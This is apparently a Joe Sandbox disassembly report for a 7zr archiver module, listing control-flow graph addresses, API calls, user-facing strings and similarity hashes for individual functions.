                                    control_flow_graph 1565 9f6c72-9f6c8e call a8fb10 1568 9f6c96-9f6c9e 1565->1568 1569 9f6c90-9f6c94 1565->1569 1571 9f6ca6-9f6cae 1568->1571 1572 9f6ca0-9f6ca4 1568->1572 1569->1568 1570 9f6cd3-9f6cdc call 9f8664 1569->1570 1578 9f6d87-9f6d92 call 9f88c6 1570->1578 1579 9f6ce2-9f6d02 call 9f67f0 call 9f2f88 call 9f87df 1570->1579 1571->1570 1573 9f6cb0-9f6cb5 1571->1573 1572->1570 1572->1571 1573->1570 1575 9f6cb7-9f6cce call 9f67f0 call 9f2f88 1573->1575 1592 9f715d-9f715f 1575->1592 1586 9f6f4c-9f6f62 call 9f87fa 1578->1586 1587 9f6d98-9f6d9e 1578->1587 1602 9f6d4a-9f6d61 call 9f7b41 1579->1602 1603 9f6d04-9f6d09 1579->1603 1600 9f6f67-9f6f74 call 9f85e2 1586->1600 1601 9f6f64-9f6f66 1586->1601 1587->1586 1591 9f6da4-9f6dc7 call 9f2e47 * 2 1587->1591 1614 9f6dc9-9f6dcf 1591->1614 1615 9f6dd4-9f6dda 1591->1615 1595 9f7118-9f7126 1592->1595 1610 9f6f76-9f6f7c 1600->1610 1611 9f6fd1-9f6fd8 1600->1611 1601->1600 1620 9f6d67-9f6d6b 1602->1620 1621 9f6d63-9f6d65 1602->1621 1603->1602 1607 9f6d0b-9f6d38 call 9f9252 1603->1607 1607->1602 1629 9f6d3a-9f6d45 1607->1629 1610->1611 1618 9f6f7e-9f6f8a call 9f6bf5 1610->1618 1616 9f6fda-9f6fde 1611->1616 1617 9f6fe4-9f6feb 1611->1617 1614->1615 1622 9f6ddc-9f6def call 9f2407 1615->1622 1623 9f6df1-9f6df9 call 9f3221 1615->1623 1616->1617 1624 9f70e5-9f70ea call 9f6868 1616->1624 1626 9f701d-9f7024 call 9f8782 1617->1626 1627 9f6fed-9f6ff7 call 9f6bf5 1617->1627 1618->1624 1644 9f6f90-9f6f93 1618->1644 1631 9f6d6d-9f6d75 1620->1631 1632 9f6d78 1620->1632 1630 9f6d7a-9f6d82 call 9f764c 1621->1630 1622->1623 1635 9f6dfe-9f6e0b call 9f87df 1622->1635 1623->1635 1646 9f70ef-9f70f3 1624->1646 1626->1624 1651 9f702a-9f7035 1626->1651 1627->1624 1649 9f6ffd-9f7000 1627->1649 1629->1592 1647 9f7116 1630->1647 1631->1632 1632->1630 1655 9f6e0d-9f6e10 1635->1655 1656 9f6e43-9f6e50 call 9f6c72 1635->1656 1644->1624 1650 9f6f99-9f6fb6 call 9f67f0 call 9f2f88 1644->1650 1652 9f710c 1646->1652 1653 9f70f5-9f70f7 1646->1653 1647->1595 1649->1624 1657 9f7006-9f701b call 9f67f0 1649->1657 1686 9f6fb8-9f6fbd 1650->1686 1687 9f6fc2-9f6fc5 call 9f717b 1650->1687 1651->1624 1659 9f703b-9f7044 call 9f8578 1651->1659 1654 9f710e-9f7111 call 9f6848 1652->1654 1653->1652 1660 9f70f9-9f7102 1653->1660 1654->1647 1662 9f6e1e-9f6e36 call 9f67f0 1655->1662 1663 9f6e12-9f6e15 1655->1663 1677 9f6f3a-9f6f4b call 9f1e40 * 2 1656->1677 1678 9f6e56 1656->1678 1679 9f6fca-9f6fcc 1657->1679 1659->1624 1676 9f704a-9f7054 call 9f717b 1659->1676 1660->1652 1668 9f7104-9f7107 call 9f717b 1660->1668 1683 9f6e58-9f6e7e call 9f2f1c call 9f2e04 1662->1683 1685 9f6e38-9f6e41 call 9f2fec 1662->1685 1663->1656 1671 9f6e17-9f6e1c 1663->1671 1668->1652 1671->1656 1671->1662 1693 9f7056-9f705f call 9f2f88 1676->1693 1694 9f7064-9f7097 call 9f2e47 call 9f1089 * 2 call 9f6868 1676->1694 1677->1586 1678->1683 1679->1654 1703 9f6e83-9f6e99 call 9f6bb5 1683->1703 1685->1683 1686->1687 1687->1679 1705 9f7155-9f7158 call 9f6848 1693->1705 1727 9f70bf-9f70cc call 9f6bf5 1694->1727 1728 9f7099-9f70af wcscmp 1694->1728 1711 9f6ecf-9f6ed1 1703->1711 1712 9f6e9b-9f6e9f 1703->1712 1705->1592 1714 9f6f09-9f6f35 call 9f1e40 * 2 call 9f6848 call 9f1e40 * 2 1711->1714 1715 9f6ec7-9f6ec9 SetLastError 1712->1715 1716 9f6ea1-9f6eae call 9f22bf 1712->1716 1714->1647 1715->1711 1725 9f6ed3-9f6ed9 1716->1725 1726 9f6eb0-9f6ec5 call 9f1e40 call 9f2e04 1716->1726 1732 9f6eec-9f6f07 call 9f31e5 1725->1732 1733 9f6edb-9f6ee0 1725->1733 1726->1703 1744 9f70ce-9f70d1 1727->1744 1745 9f7129-9f7133 call 9f67f0 1727->1745 1729 9f70bb 1728->1729 1730 9f70b1-9f70b6 1728->1730 1729->1727 1736 9f7147-9f7154 call 9f2f88 call 9f1e40 1730->1736 1732->1714 1733->1732 1738 9f6ee2-9f6ee8 1733->1738 1736->1705 1738->1732 1750 9f70d8-9f70e4 call 9f1e40 1744->1750 1751 9f70d3-9f70d6 1744->1751 1761 9f713a 1745->1761 1762 9f7135-9f7138 1745->1762 1750->1624 1751->1745 1751->1750 1764 9f7141-9f7144 1761->1764 1762->1764 1764->1736
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 009F6C77
                                    • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 009F6EC9
                                      • Part of subcall function 009F6C72: wcscmp.MSVCRT ref: 009F70A5
                                      • Part of subcall function 009F6BF5: __EH_prolog.LIBCMT ref: 009F6BFA
                                      • Part of subcall function 009F6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 009F6C1A
                                      • Part of subcall function 009F6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 009F6C49
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                    • String ID: :$DATA
                                    • API String ID: 3316598575-2587938151
                                    • Opcode ID: 335753a21077bd83c07b4bedd69cfe806a5fde26d9a4d332f7ffce58fd037ab9
                                    • Instruction ID: 46edc225e3ba92b7e87088c7fbae20cd34025cc43aa8a2a4c44ffd9eebe4808a
                                    • Opcode Fuzzy Hash: 335753a21077bd83c07b4bedd69cfe806a5fde26d9a4d332f7ffce58fd037ab9
                                    • Instruction Fuzzy Hash: BBE13231A0430DDACF21EFA4C891BFEF7B5AF54314F204519EA866B2D2DB70A949CB50
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$H_prolog
                                    • String ID: =
                                    • API String ID: 2614055831-2525689732
                                    • Opcode ID: 10b2220205b38bc553ebe92f66a307834e844cf0e2177a1d946c547b98dcdca2
                                    • Instruction ID: 5d0356811dff2647fe81993554bcb13d0a64ef7c942137e6adbe84d94dfaf588
                                    • Opcode Fuzzy Hash: 10b2220205b38bc553ebe92f66a307834e844cf0e2177a1d946c547b98dcdca2
                                    • Instruction Fuzzy Hash: A4216D32905118EFCF09EB98E952BEDBBB5EF88310F20002AF50572192DF756E45CBA5
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A28346
                                    • fputs.MSVCRT ref: 00A2835B
                                    • fputs.MSVCRT ref: 00A28364
                                      • Part of subcall function 00A283BF: __EH_prolog.LIBCMT ref: 00A283C4
                                      • Part of subcall function 00A283BF: fputs.MSVCRT ref: 00A28401
                                      • Part of subcall function 00A283BF: fputs.MSVCRT ref: 00A28437
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$H_prolog
                                    • String ID: =
                                    • API String ID: 2614055831-2525689732
                                    • Opcode ID: ea1fad000b9a27b42fc67de273177a0942e54443f032b29fd4e40672802bd08a
                                    • Instruction ID: 07c656ee84d2257a9bb92bd68e3973d057c5eddb0ae17e0a1baa0a7a313aacc1
                                    • Opcode Fuzzy Hash: ea1fad000b9a27b42fc67de273177a0942e54443f032b29fd4e40672802bd08a
                                    • Instruction Fuzzy Hash: 0601A231A00019EBCF05FBA8D812BEEBB76EF84710F10402AF505962A1CF794A55DBD5
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A1209B
                                      • Part of subcall function 009F757D: GetLastError.KERNEL32(009FD14C), ref: 009F757D
                                      • Part of subcall function 00A12C6C: __EH_prolog.LIBCMT ref: 00A12C71
                                      • Part of subcall function 009F1E40: free.MSVCRT ref: 009F1E44
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$ErrorLastfree
                                    • String ID: Cannot find archive file$The item is a directory
                                    • API String ID: 683690243-1569138187
                                    • Opcode ID: 35f6115f1bee9941719dc0c352fa901e84621f32288ec2cc53afd58aca072962
                                    • Instruction ID: a773ceb9e4cf73553aa7731a2199deec12821197b027f95f8cc761306829db21
                                    • Opcode Fuzzy Hash: 35f6115f1bee9941719dc0c352fa901e84621f32288ec2cc53afd58aca072962
                                    • Instruction Fuzzy Hash: DA724774D00258DFCB25DFA8C984BEDBBB5BF58300F24409AE959AB252C7709E91CF91
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: CountTickfputs
                                    • String ID: .
                                    • API String ID: 290905099-4150638102
                                    • Opcode ID: 07b029423ae785851c614ddf38939e082c31c432050db2176f1a32d51891aa67
                                    • Instruction ID: 92171c9bf02d0ab366bc7588b58a75a1732a8a24c084c3f91c4473ec61befdf2
                                    • Opcode Fuzzy Hash: 07b029423ae785851c614ddf38939e082c31c432050db2176f1a32d51891aa67
                                    • Instruction Fuzzy Hash: 1E715730600B189FCB25EF68D991BAEB7F6AF81714F10482DE58797A41DB70F949CB11
                                    APIs
                                      • Part of subcall function 009F9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 009F9CB3
                                      • Part of subcall function 009F9C8F: GetProcAddress.KERNEL32(00000000), ref: 009F9CBA
                                      • Part of subcall function 009F9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 009F9CC8
                                    • __aulldiv.LIBCMT ref: 00A3093F
                                    • __aulldiv.LIBCMT ref: 00A3094B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                    • String ID: 3333
                                    • API String ID: 3520896023-2924271548
                                    • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                    • Instruction ID: 5b088fa5e193e8e8a97f458e9dce8b9e77ae97328a5a1876d5e8ed9229f3d258
                                    • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                    • Instruction Fuzzy Hash: 8E2195B19007046FE730EF7A8881B5BBAF9FB84750F00892EB18AD3642D670A9408B65
                                    APIs
                                      • Part of subcall function 009F1E40: free.MSVCRT ref: 009F1E44
                                    • memset.MSVCRT ref: 00A1AEBA
                                    • memset.MSVCRT ref: 00A1AECD
                                      • Part of subcall function 00A304D2: _CxxThrowException.MSVCRT(?,00AA4A58), ref: 00A304F8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: memset$ExceptionThrowfree
                                    • String ID: Split
                                    • API String ID: 1404239998-1882502421
                                    • Opcode ID: 3f6dcd315a741492b63e720ee606b91e052fb9414fe26efb56b2b53f408c8f64
                                    • Instruction ID: 30b78843b3120bc54b2a5e095d8bf087516b446e526628de2c90b224deed66a4
                                    • Opcode Fuzzy Hash: 3f6dcd315a741492b63e720ee606b91e052fb9414fe26efb56b2b53f408c8f64
                                    • Instruction Fuzzy Hash: D5427A30A05248DFDF25DBA4C984BEDBBB6BF55304F2440A9E449A7252CB31AEC5CF52
                                    APIs
                                    • fputs.MSVCRT ref: 00A28437
                                    • fputs.MSVCRT ref: 00A28401
                                      • Part of subcall function 009F1FB3: __EH_prolog.LIBCMT ref: 009F1FB8
                                    • __EH_prolog.LIBCMT ref: 00A283C4
                                      • Part of subcall function 009F1FA0: fputc.MSVCRT ref: 009F1FA7
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prologfputs$fputc
                                    • String ID:
                                    • API String ID: 678540050-0
                                    • Opcode ID: 4076f19b03baca7c7b81d4e5b8783106cbc44822646adf8b2cfaa6e291d720fa
                                    • Instruction ID: 03af76c54afc2b49379cc5972894dc09a19c55f49eb5ba41e68955cdab4c1189
                                    • Opcode Fuzzy Hash: 4076f19b03baca7c7b81d4e5b8783106cbc44822646adf8b2cfaa6e291d720fa
                                    • Instruction Fuzzy Hash: 21118631B0411A9BCF09B7A4D8137BEBFB5EFC0760F100029F60193291DF6A194187D4
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A12CE0
                                      • Part of subcall function 009F5E10: __EH_prolog.LIBCMT ref: 009F5E15
                                      • Part of subcall function 00A041EC: _CxxThrowException.MSVCRT(?,00AA4A58), ref: 00A0421A
                                      • Part of subcall function 009F965D: VariantClear.OLEAUT32(?), ref: 009F967F
                                    Strings
                                    • Cannot create output directory, xrefs: 00A13070
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$ClearExceptionThrowVariant
                                    • String ID: Cannot create output directory
                                    • API String ID: 814188403-1181934277
                                    • Opcode ID: d386cc15efb78c297115e1e397ca56b9407011783e4bd1ef7faed53a3c45aa2d
                                    • Instruction ID: 354e11a5c0d7622d74610deb5350cde6114943f111734b3a354224912ee859f0
                                    • Opcode Fuzzy Hash: d386cc15efb78c297115e1e397ca56b9407011783e4bd1ef7faed53a3c45aa2d
                                    • Instruction Fuzzy Hash: A8F1B131901289EFCF21EFA4C990BEDBFB5BF58300F1440A9E54567252DB31AE96CB51
                                    APIs
                                    • fputs.MSVCRT ref: 00A2C840
                                      • Part of subcall function 009F25CB: _CxxThrowException.MSVCRT(?,00AA4A58), ref: 009F25ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: ExceptionThrowfputs
                                    • String ID:
                                    • API String ID: 1334390793-399585960
                                    • Opcode ID: 925445313ced93fc435957e22825607feced8653e9591f3523406e01f151af90
                                    • Instruction ID: cd79746fbebee4aa5e2cdb89aefb3bec9ce94c7bbdce39ff575f6d26255d9a7d
                                    • Opcode Fuzzy Hash: 925445313ced93fc435957e22825607feced8653e9591f3523406e01f151af90
                                    • Instruction Fuzzy Hash: 2C11B2716047449FDB25CF5CD8D1BAABBE6EF85314F14847EE1468B251C7B1B804C760
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs
                                    • String ID: Open
                                    • API String ID: 1795875747-71445658
                                    • Opcode ID: 61f4e7ca1c9478b745913735417c57eed5b8df660979d7bac1d4fbd7e8dd187b
                                    • Instruction ID: f6638e39da4b919dec66d9c5108a2ee1101b5c50ffeab4e8a75d96b30f806667
                                    • Opcode Fuzzy Hash: 61f4e7ca1c9478b745913735417c57eed5b8df660979d7bac1d4fbd7e8dd187b
                                    • Instruction Fuzzy Hash: E1119E321057149FC720EF78E991AEABBA5EF54320B50893EE19A87212DB31B904CF50
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A406B3
                                    • _CxxThrowException.MSVCRT(?,00AAD480), ref: 00A408F2
                                      • Part of subcall function 009F1E0C: malloc.MSVCRT ref: 009F1E1F
                                      • Part of subcall function 009F1E0C: _CxxThrowException.MSVCRT(?,00AA4B28), ref: 009F1E39
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: ExceptionThrow$H_prologmalloc
                                    • String ID:
                                    • API String ID: 3044594480-0
                                    • Opcode ID: a0aa179cf8342e58650e16ab80d01f52af52c712f60dd6651fadd7ebcc1c5a34
                                    • Instruction ID: ed780125618b5e4d33119976722cbe9a72325a3bf742ddac2f7b7032fe4fbb52
                                    • Opcode Fuzzy Hash: a0aa179cf8342e58650e16ab80d01f52af52c712f60dd6651fadd7ebcc1c5a34
                                    • Instruction Fuzzy Hash: DE914975900249DFCF21DFA8C981EEEBBB5BF49304F1441A9E549A7252CB30AE44DFA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: cc7d75185353fbfe6b620e673f9782b4e7475c6cdc410b298fbf8dd35051ac6c
                                    • Instruction ID: 2cc64252ee60e4f53edca341014eb72fdbdd9b736c84212666997e84300afca6
                                    • Opcode Fuzzy Hash: cc7d75185353fbfe6b620e673f9782b4e7475c6cdc410b298fbf8dd35051ac6c
                                    • Instruction Fuzzy Hash: 34F1DE70904789CFCF25CF64D590AAABBF1BF18308F54486EE48A9B291D731BDA4CB51
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A04255
                                      • Part of subcall function 00A0440B: __EH_prolog.LIBCMT ref: 00A04410
                                      • Part of subcall function 009F1E0C: malloc.MSVCRT ref: 009F1E1F
                                      • Part of subcall function 009F1E0C: _CxxThrowException.MSVCRT(?,00AA4B28), ref: 009F1E39
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$ExceptionThrowmalloc
                                    • String ID:
                                    • API String ID: 3744649731-0
                                    • Opcode ID: 3de10be56260c9cae1e58860a1536d41e0f0c90e98238a21b7e3514df14272fb
                                    • Instruction ID: a6efe750ce0883a7efbb7d60035854a7bbf569d787028c55dfd981d301874070
                                    • Opcode Fuzzy Hash: 3de10be56260c9cae1e58860a1536d41e0f0c90e98238a21b7e3514df14272fb
                                    • Instruction Fuzzy Hash: 795107B0501B48CFC725DF69C18469AFFF0BF19304F5488AEC19A9B752D7B0A648CB61
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: 56702716d12d2e0fe80fc26704810a85f40bfdfb2b72efb40b8f3bae6974755d
                                    • Instruction ID: efeff465ad667b75cb91536c7ec81cc35ae2c6c2b1b096a09575d0a4b171cfae
                                    • Opcode Fuzzy Hash: 56702716d12d2e0fe80fc26704810a85f40bfdfb2b72efb40b8f3bae6974755d
                                    • Instruction Fuzzy Hash: 6D311CB1D00219EFCB14EF95C991CEEBBB5FF94364B20851EE42A67251C7B49D81CBA0
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A1021F
                                      • Part of subcall function 00A03D66: __EH_prolog.LIBCMT ref: 00A03D6B
                                      • Part of subcall function 00A03D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03D7D
                                      • Part of subcall function 00A03D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03D94
                                      • Part of subcall function 00A03D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00A03DB6
                                      • Part of subcall function 00A03D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03DCB
                                      • Part of subcall function 00A03D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03DD5
                                    Memory Dump Source
